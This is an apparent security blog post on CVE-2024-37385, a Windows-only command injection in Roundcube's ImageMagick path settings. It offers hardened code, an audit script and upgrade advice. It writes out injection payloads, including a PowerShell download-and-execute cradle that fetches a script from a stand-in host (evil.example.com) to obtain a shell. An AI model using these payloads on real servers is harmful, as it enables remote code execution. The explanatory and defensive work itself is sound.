CVE-2024-37385 - How a Missed Patch in Roundcube Webmail Led to RCE on Windows (with Code and Exploit Demo)

Roundcube is a hugely popular open-source webmail client used by thousands of organizations. But security nightmares repeat, and sometimes old problems come back in new ways. One such case is CVE-2024-37385, a command injection vulnerability in Roundcube running on Windows that exists because the earlier fix for CVE-2020-12641 was incomplete.

This long-read explains what went wrong, shows you sample code, links the best references, and gives a simple exploit demo—all focused on helping admins and curious readers secure their Roundcube instances.

On Windows servers only

The core problem is command injection through im_convert_path and im_identify_path. These are the configuration options that hold the paths to ImageMagick's "convert" and "identify" binaries, which Roundcube invokes to generate image thumbnails and convert images for display. Only Windows installations are affected; the same configuration is safe on Linux and other POSIX systems.

Incomplete Fix for Old CVE

This CVE exists because the patch for CVE-2020-12641 did not account for how cmd.exe parses a command line. An attacker who can set these config options, or otherwise influence Roundcube's settings, can make the web server run arbitrary commands.

Attack Pre-Condition

- The attacker can set im_convert_path or im_identify_path in config/config.inc.php. Roundcube has no admin UI for these options, so in practice this means write access to the config file: a foothold gained through lateral movement, a hosting control panel that manages the file, or weak administrator credentials on the host.

If the attacker controls that value, they can run any Windows command with the privileges of the account running PHP (the IIS application pool identity or the Apache/PHP service account).

Example: Malicious Path in Config

// config/config.inc.php
$config['im_convert_path'] = 'C:\\Windows\\System32\\cmd.exe /C calc.exe';

Above, Roundcube believes it is invoking "convert"; what actually runs is cmd.exe /C calc.exe, so the Windows calculator starts on the server (a harmless way to prove execution on a test box).

Why does it work?
The configured value is concatenated verbatim into the command line and handed to cmd.exe by exec(). cmd.exe /C runs whatever follows as a command, so the attacker's command executes, and the image-file arguments Roundcube appends are simply passed along after it (or ignored).

Imagine the attacker wants a reverse shell. A download-and-execute cradle does the job:

$config['im_convert_path'] = 'C:\\Windows\\System32\\cmd.exe /C powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString(\'http://evil.example.com/shell.ps1\')"';

- The next time Roundcube needs an image conversion (a user opens a message with an image attachment that needs a thumbnail, for example), that PowerShell script is fetched and run under the web server's account.

In the vulnerable Roundcube versions, the code that handles image conversion has roughly this shape (illustrative, not the project's exact source):

function image_convert($input, $output_file) {
    global $RCMAIL;
    // The configured tool path goes into the command line verbatim, with no
    // validation or quoting; only the two file arguments are escaped.
    $cmd = $RCMAIL->config->get('im_convert_path') . " " . escapeshellarg($input) . " " . escapeshellarg($output_file);
    // On Windows, exec() hands this string to cmd.exe, which parses it.
    exec($cmd, $lines, $return_var);
    return $return_var;
}

The weak spot is the first piece of the string. escapeshellarg() protects $input and $output_file, but the configured tool path is never escaped or validated, so whatever it contains reaches the shell as-is. Note also that escapeshellarg() behaves differently on Windows: it wraps the value in double quotes and replaces %, ! and " with spaces instead of escaping them, so code that is safe under /bin/sh is not automatically safe under cmd.exe.

- If the config value (im_convert_path) starts with cmd.exe /c, exec() runs the rest of it as a command.

The 2020 fix held up on *nix because it was written against POSIX shell behavior. cmd.exe parses command lines by different rules, so a value that passed the earlier check could still inject a command on Windows. That is the incomplete fix behind CVE-2024-37385.

Any other command works the same way. A second harmless proof-of-concept for your own test system:

$config['im_convert_path'] = 'C:\\Windows\\System32\\cmd.exe /C notepad.exe';
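Below is an added example of how this code path can be hardened. It is not Roundcube's own fix and does not reproduce the project's actual code; the function names safe_tool_path() and image_convert_hardened() are this example's own. It assumes PHP 7.4 or later, whose proc_open() accepts an argv array and starts the process directly, without cmd.exe or /bin/sh. The validation is deliberately stricter than a minimal fix: the configured value must be a single absolute path made only of path characters that resolves to an existing executable, so a value like cmd.exe /C ... is rejected before anything runs, and even a value that slipped through could not reach a shell.

```php
<?php
// Added example, not Roundcube's code: a hardened replacement for the
// illustrative image_convert() shown in this post. Two changes close the hole:
//  1. the configured tool path is validated as a bare path to an existing
//     executable before use (no spaces, no quotes, no "/C");
//  2. the process is started with proc_open() and an argv ARRAY, which PHP
//     (>= 7.4) launches directly, without cmd.exe or /bin/sh, so nothing in
//     the arguments can be interpreted as a shell command.

/**
 * Return the validated real path of an image tool, or null if the configured
 * value is unsafe. Only characters that appear in drive letters, directory
 * names and file names are accepted; spaces, quotes, '&', '|', ';' etc. fail.
 */
function safe_tool_path(?string $configured): ?string
{
    if ($configured === null || $configured === '') {
        return null;                                   // feature disabled
    }
    // Absolute path only: optional drive letter, then a separator, then path chars.
    if (!preg_match('~^(?:[A-Za-z]:)?[\\\\/][A-Za-z0-9_.\\\\/-]+$~', $configured)) {
        return null;
    }
    $real = realpath($configured);
    if ($real === false || !is_file($real) || !is_executable($real)) {
        return null;                                   // must exist and be runnable
    }
    return $real;
}

/**
 * Run "<tool> <in> <out>" without a shell. Returns the exit code, or -1 if the
 * tool path was rejected or the process could not be started.
 */
function image_convert_hardened(string $tool_path, string $input, string $output): int
{
    $tool = safe_tool_path($tool_path);
    if ($tool === null) {
        error_log("image_convert: refusing unsafe im_convert_path: $tool_path");
        return -1;
    }
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    // Array form: element 0 is the executable, every other element is ONE
    // argument. PHP passes them to the OS directly; no shell sees them.
    $proc = proc_open([$tool, $input, $output], $spec, $pipes);
    if (!is_resource($proc)) {
        return -1;
    }
    fclose($pipes[1]);
    fclose($pipes[2]);
    return proc_close($proc);
}

// Demonstration with constructed values. The first three are rejected before
// anything executes; the last one runs only if /usr/bin/true exists here.
$cases = [
    'C:\\Windows\\System32\\cmd.exe /C calc.exe',                 // payload from this post
    'C:\\Windows\\System32\\cmd.exe /C powershell -nop -c "IEX"',  // cradle variant
    '/usr/bin/convert; id',                                        // Unix-style injection
    '/usr/bin/true',                                               // plain path, accepted if present
];
foreach ($cases as $value) {
    $verdict = safe_tool_path($value) === null ? 'REJECTED' : 'accepted';
    echo str_pad($verdict, 9), $value, PHP_EOL;
}
echo 'exit code for /usr/bin/true: ',
     image_convert_hardened('/usr/bin/true', 'in.jpg', 'out.jpg'), PHP_EOL;
```

Run it with the php CLI on any host. If you port the idea into real code, keep both halves: the whitelist stops an attacker-controlled path from pointing at cmd.exe or powershell.exe in the first place, and the shell-less launch means a path that somehow passes validation still cannot carry extra commands, because there is no command-line parser left to abuse.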

Patching and Prevention

Solution:
Upgrade to Roundcube 1.5.7 or 1.6.7 (or any later release); both contain the fix. To confirm what is installed, check the RCMAIL_VERSION constant in program/include/iniset.php or the About dialog in the webmail UI.

Defense in depth, whether or not you have upgraded yet:

- Leave im_convert_path and im_identify_path unset unless you actually need ImageMagick; an empty value disables this code path.
- Make config/config.inc.php read-only for the account that runs PHP. The attacker's precondition is writing that file.
- Run PHP under a dedicated low-privilege account so that a successful injection does not hand over the whole host.
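For admins who want a quick check, here is an added audit script; it is not a Roundcube tool, and its function names and layout assumptions (program/include/iniset.php, config/config.inc.php under the current directory) are the example's own. It reads RCMAIL_VERSION, compares it with the fixed releases, warns if the config file is writable by the account running the script, and flags im_convert_path or im_identify_path values that contain whitespace or shell metacharacters. When no installation is found it falls back to a constructed config so the checks can be seen offline.

```php
<?php
// Added audit example, not part of Roundcube. Run from the Roundcube root:
//   php audit_cve_2024_37385.php
// Assumes the standard layout (program/include/iniset.php, config/config.inc.php).

// RCMAIL_VERSION is defined in program/include/iniset.php; read it with a
// regex instead of bootstrapping the whole application.
function installed_version(string $root): ?string
{
    $file = "$root/program/include/iniset.php";
    if (!is_readable($file)) {
        return null;
    }
    $src = file_get_contents($file);
    if (preg_match("/define\\('RCMAIL_VERSION',\\s*'([^']+)'\\)/", $src, $m)) {
        return $m[1];
    }
    return null;
}

// CVE-2024-37385 is fixed in 1.5.7 and 1.6.7 and everything newer.
// Branches older than 1.5 are end-of-life and never received the fix.
function is_fixed_version(string $version): bool
{
    if (version_compare($version, '1.6.0', '>=')) {
        return version_compare($version, '1.6.7', '>=');
    }
    if (version_compare($version, '1.5.0', '>=')) {
        return version_compare($version, '1.5.7', '>=');
    }
    return false;
}

// Inspect the two tool paths. A legitimate value is one bare path; whitespace
// or shell metacharacters mean something is being smuggled into the command
// line. Spaces are flagged on purpose: the path is concatenated unquoted (see
// the vulnerable snippet above), so a path with spaces is unusable anyway.
function tool_path_findings(array $config): array
{
    $findings = [];
    foreach (['im_convert_path', 'im_identify_path'] as $key) {
        $value = $config[$key] ?? null;
        if ($value === null || $value === '') {
            continue;                          // unset: feature off, nothing to inject
        }
        if (preg_match('/[\s"\'&|;<>^%!`$()]/', $value)) {
            $findings[] = "$key contains shell syntax: $value";
        } elseif (!is_file($value)) {
            $findings[] = "$key does not point to an existing file: $value";
        }
    }
    return $findings;
}

$root    = getcwd();
$cfgFile = "$root/config/config.inc.php";

$version = installed_version($root);
echo 'Roundcube version: ', $version ?? 'not found', PHP_EOL;
if ($version !== null) {
    echo is_fixed_version($version)
        ? "  OK: fixed release\n"
        : "  VULNERABLE: upgrade to 1.5.7 / 1.6.7 or later\n";
}

if (is_readable($cfgFile)) {
    if (is_writable($cfgFile)) {
        echo "WARNING: $cfgFile is writable by the account running this script\n";
    }
    $config = [];
    include $cfgFile;                          // config.inc.php assigns into $config[...]
} else {
    // Constructed stand-in so the checks can be exercised outside an install.
    echo "No config.inc.php here; checking a constructed sample instead\n";
    $config = [
        'im_convert_path'  => 'C:\\Windows\\System32\\cmd.exe /C calc.exe',
        'im_identify_path' => null,
    ];
}

foreach (tool_path_findings($config) as $finding) {
    echo "FINDING: $finding\n";
}
```

Run it as the same account the web server uses; the writability warning is only meaningful from that identity. A clean result is a fixed version, a read-only config, and either empty tool paths or bare paths to existing ImageMagick binaries.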

References and Further Reading

- Roundcube Security Announcement (CVE-2024-37385)
- CVE-2024-37385 at Mitre
- Previous CVE-2020-12641
- Roundcube GitHub
- Escaping Shell Commands in PHP

Final Thoughts

This case should remind every sysadmin: Security patches aren't just about putting out today’s fire. On Windows, shell quirks create easy, dangerous paths for attackers—especially with tools like webmail running with significant access. Review security advisories, and always treat configuration paths as untrusted input.

Upgrade now.
If you need more technical details or want exploits/scripts, check the links above or ask in forums dedicated to infosec.

Timeline

Published on: 06/07/2024 04:15:30 UTC
Last modified on: 08/01/2024 13:53:32 UTC